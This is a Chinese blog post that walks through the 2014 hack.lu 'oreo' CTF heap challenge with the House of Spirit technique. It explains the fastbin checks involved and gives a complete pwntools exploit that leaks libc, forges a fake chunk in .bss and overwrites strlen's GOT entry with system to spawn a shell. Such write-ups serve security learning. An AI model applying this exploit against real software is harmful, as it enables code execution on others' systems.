【PWN · heap | House Of Spirit】2014_hack.lu_oreo

于 2024-02-05 11:36:00 发布
阅读量851 收藏 17
点赞数 20
分类专栏: 【PWN · Heap】 文章标签: ctf pwn 劫持GOT heap House Of Spirit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/136037893
版权

呜呜呜,时隔多个月,继续学pwn

目录

前言

零、House Of Spirit介绍

一、题目分析

二、调试过程

1.泄露libc

2.大量add设置fake chunk的size合法

3.message 构造fake chunk的next chunk合法,绕过检测

4.order释放,将fake chunk放到fast bin中,等待add返回

5.修改notice指针,指向got表

6.通过message,修改notice指向的区域(got表,这里是strlen的got表)

三、exp 

前言

将chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。

零、House Of Spirit介绍

House of Spirit 是 the Malloc Maleficarum 中的一种技术。

该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。

要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即

  • 1、fake chunk 的 ISMMAP 位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理 IS_MAPPED,记录当前 chunk 是否是由 mmap 分配的,这个标志位位于size低二比特位
  • 2、fake chunk 地址需要对齐, MALLOC_ALIGN_MASK 因为fake_chunk可以在任意可写位置构造,这里对齐指的是地址上的对齐而不仅仅是内存对齐,比如32位程序的话fake_chunk的prev_size所在地址就应该位0xXXXX0或0xXXXX4。64位的话地址就应该在0xXXXX0或0xXXXX8
  • 3、fake chunk 的 size 大小需要满足对应的 fastbin 的需求,同时也得对齐 fake_chunk如果想挂进fastbin的话构造的大小就不能大于0x80,关于对齐和上面一样,并且在确定prev_size的位置后size所在位置要满足堆块结构的摆放位置
  • 4、fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ,同时也不能大于av->system_mem fake_chunk 的大小,大小必须是 2 * SIZE_SZ 的整数倍。如果申请的内存大小不是 2 * SIZE_SZ 的整数倍,会被转换满足大小的最小的 2 * SIZE_SZ 的倍数。32 位系统中,SIZE_SZ 是 4;64 位系统中,SIZE_SZ 是 8。最大不能超过av->system_mem,即128kb。next_chunk的大小一般我们会设置成为一个超过fastbin最大的范围的一个数,但要小雨128kb,这样做的目的是在chunk连续释放的时候,能够保证伪造的chunk在释放后能够挂在fastbin中main_arena的前面,这样以来我们再一次申请伪造chunk大小的块时可以直接重启伪造chunk
  • 5、fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free 的情况 这个检查就是fake_chunk前一个释放块不能是fake_chunk本身,如果是的话_int_free函数就会检查出来并且中断

想要使用该技术分配 chunk 到指定地址,其实并不需要修改指定地址的任何内容,关键是要能够修改指定地址的前后的内容使其可以绕过对应的检测

一、题目分析

首先查看保护信息

我们可以往劫持got表的方向考虑

(图片来自好好说话系列博客)

一方面,这种长度可以控制物理临近chunk的控制字段;然而不可忽视的是,如果结构中有关键指针,通过溢出覆盖指针位为指定值,则很有可能得到任意地址读写执行等效果。

实际上,next就是一个指针,起到的效果是,将一块块申请到的rifle结构体,以链接的形式存储。next指向下一块结构体。

该怎么利用呢?不妨先看看其他功能。

free会将链接起来的结构体全部free,直到遇到next=NULL

结合main函数中对notice的赋值

因此,不难发现,最初的notice指针,是往临近自己的一块全局变量数组区域中,写信息。

再看看其他函数功能

试想我们能够伪造结构体指针,那么就可以把结构体指针指向区域偏移0x0和偏移0x19的地方连续读取信息。

show_state函数似乎没什么用,但是其中涉及到的变量——rifle_cnt以及order_num分别在add和order时自增1。或者说,这两个值的大小,我们愿意的话,是可以被我们控制的!

不容忽视的是,这两个全局变量,在内存布局上和其他全局变量的位置关系!

对整个程序有了基本了解之后,我们考虑如何劫持got表。

  1. libc如何泄露?(获得system、binsh)
  2. 如何修改?

泄露需要读权限——伪造结构体指针?!

修改——①message指针具有写权限 ②结构体指针在创建时具有写权限

综上,可以利用House Of Spirit手法,实现上述目标。

大致流程如下

  1. 泄露libc:利用创建结构体时的堆溢出漏洞,覆盖next指针为got表地址,这样在show_rifle时,会将最后一个next指针指向的区域,也即got表内容泄露出来
  2. 修改got表:
    1. 由于order_num、rifle_cnt、notice、unk_804a2c0这四个全局变量的位置关系,以及本身特性,可以构造fake chunk
    2. 首先将rifle_cnt的值通过反复add,控制到指定大小(0x41)作为fake chunk的size域。
    3. 再add一个结构体,并通过溢出修改next指针为fake chunk区域,具体位置详见d
    4. 为了链条free时,free fake chunk 有效,还需要将fake chunk的next chunk的size域控制到合理大小,而message具有写权限,且由于相对距离关系,可以通过message来构造
      1. 注意:fake chunk的next域需要设为NULL!当时卡了好久
      2. fake chunk的next域需要大小不能小于 2 * SIZE_SZ,同时也不能大于av->system_mem
    5. 通过order free掉所有结构体,注意,最后一个被free的结构体是构造的fake chunk!
    6. 通过add,可以获取fake chunk,注意,此时fake chunk是在bss段上,且创建时具有的写权限,可以修改notice值!——这就好比notice所在的指针具有写权限,而notice是手,我们可以控制手的位置,实现任意地址写的权限!——通过add时复写notice值为got表地址
    7. 然后再次通过message,实现修改got表的目的。

至此,可通过键入b’/bin/sh\x00’来getshell!

二、调试过程

细致地了解,每一步发生什么,最终getshell,对于整体的理解,是非常重要的。

这是一个很美妙的过程,

1.泄露libc

2.大量add设置fake chunk的size合法

3.message 构造fake chunk的next chunk合法,绕过检测

4.order释放,将fake chunk放到fast bin中,等待add返回

5.修改notice指针,指向got表

6.通过message,修改notice指向的区域(got表,这里是strlen的got表)

这是因为,修改为 p32(system)+b';/bin/sh\x00'

已经通过构造的system(’/bin/sh\x00’),getshell

三、exp

from pwn import *
from LibcSearcher import *
context(arch='i386',log_level='debug')

io=process('./pwn')
elf=ELF('./pwn')
def add(name,description):
    # io.recvuntil(b'Action:')
    io.sendline(b'1')
    io.sendline(name)
    io.sendline(description)
def show_rifles():
    # io.recvuntil(b'Action:')
    io.sendline(b'2')
def free_order():
    # io.recvuntil(b'Action:')
    io.sendline(b'3')
def message(msg):
    io.sendline(b'4')
    io.sendline(msg)
gdb.attach(io);input('[+]gdb attached!')

#########泄露libc
puts_got=elf.got['puts']
add(b'a'*27+p32(puts_got),b'leak libc')
show_rifles()
puts_real=u32(io.recvuntil(b'\xf7')[-4:])
success('puts:'+hex(puts_real))
libc=LibcSearcher('puts',puts_real)
libc_base=puts_real-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
success('system:'+hex(system))
success('binsh:'+hex(binsh))
input('[!]check!')

#########控制size字段
head=0x804A288 
rifle_cnt=0x804A2A4 
for i in range(0x40-1):
    # add(b'a'*27+p32(0),b'b')
    add(b'a',b'padding')
add(b'a'*27+p32(rifle_cnt+4),b'b')
input('[!]check!')

#########控制next chunk字段,合法绕过检测
payload=b'a'*(0x38-(0x804A2C0-0x804A2A8)-0x4)+p32(0)+p32(0)+p32(0x41)
message(payload)
input('[!]check!')

#########将fake chunk放到fastbin中
free_order()
input('[!]check!')

#########修改notice指针,指向strlen_got
add(b'a',p32(elf.got['strlen']))
input('[!]check!')

#########劫持got表为system,并输入/bin/sh\x00参数
message(p32(system)+b';/bin/sh\x00')
input('[!]check!!')

#########getshell!!!
io.interactive()
Mr_Fmnwon
关注
  • 20
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
pwn_out.rar_PWM输出_fpga PWM _out_pwm fpga_vhdl fpga pwm
07-14
FPGA入门系列实验教程——PWM输出控制LED显示
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
idafree76_linux.run
08-12
都说ida很少有linux版本的,找到一个
PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1315
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
pwn工具箱之house of spirit
jmp esp
07-03 915
house of spirit基本信息 利用种类:堆利用 堆利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
house-of-spirit-pwn200
csdn546229768的博客
01-11 2552
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完堆知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将堆变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1617
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
PWN学习之house of系列
qq_41071646的博客
08-09 1378
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个堆块 然后让 free到这个堆块 让 伪造堆块进入...
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1214
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
pyzmq-23.2.1-cp310-cp310-musllinux_1_1_x86_64.whl
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
springboot769旅游管理系统.mp4
06-07
项目运行视频
数据库的阿萨德概述.txt
06-07
数据库的阿萨德概述.txt
grpcio-1.16.0-cp37-cp37m-macosx_10_9_x86_64.whl
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
最专业的devops工程师学习路径,无论是专业devops,还是IT小白,都值得拥有
06-07
成为一名专业的DevOps工程师是一个持续学习和实践的过程。无论您是专业DevOps工程师还是IT小白,以下学习路径都是值得拥有的: ### 初学者阶段 1. **编程基础**:学习至少一种编程语言,如Python或Shell脚本编写,这将帮助您自动化任务和编写工具。 2. **操作系统和网络基础**:理解Linux系统和网络基础,这对于配置和管理服务器至关重要。 3. **版本控制**:掌握Git,这是现代软件开发中不可或缺的工具。 4. **CI/CD工具**:熟悉Jenkins或GitLab CI等工具,以实现持续集成和持续部署。 5. **容器技术**:学习Docker和Kubernetes,以实现应用的容器化和编排。 6. **云服务**:了解AWS、Azure或Google Cloud Platform等云服务的基本操作。
v8390966-xhs-Guanfang_X64.apk
最新发布
06-07
v8390966-xhs-Guanfang_X64.apk
stream.x64.x-none.rarstream.x64.x-none.rarstream.x64.x-none.rars
06-07
stream.x64.x-none.rarstream.x64.x-none.rarstream.x64.x-none.rars
springboot751的社区维修平台.mp4
06-07
项目运行视频
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
08-17
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA是用来表示不同内存区块的缩写标记。其中,STACK代表栈空间,HEAP代表堆空间,CODE代表代码段,DATA代表数据段,RWX代表可读、可写、可执行的空间,RODATA代表只读的数据段。这些标记通常用于描述程序的内存布局,以帮助理解程序的运行机制。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [realloc函数UAF利用|攻防世界pwn进阶区supermarket](https://blog.csdn.net/weixin_43092232/article/details/105014161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值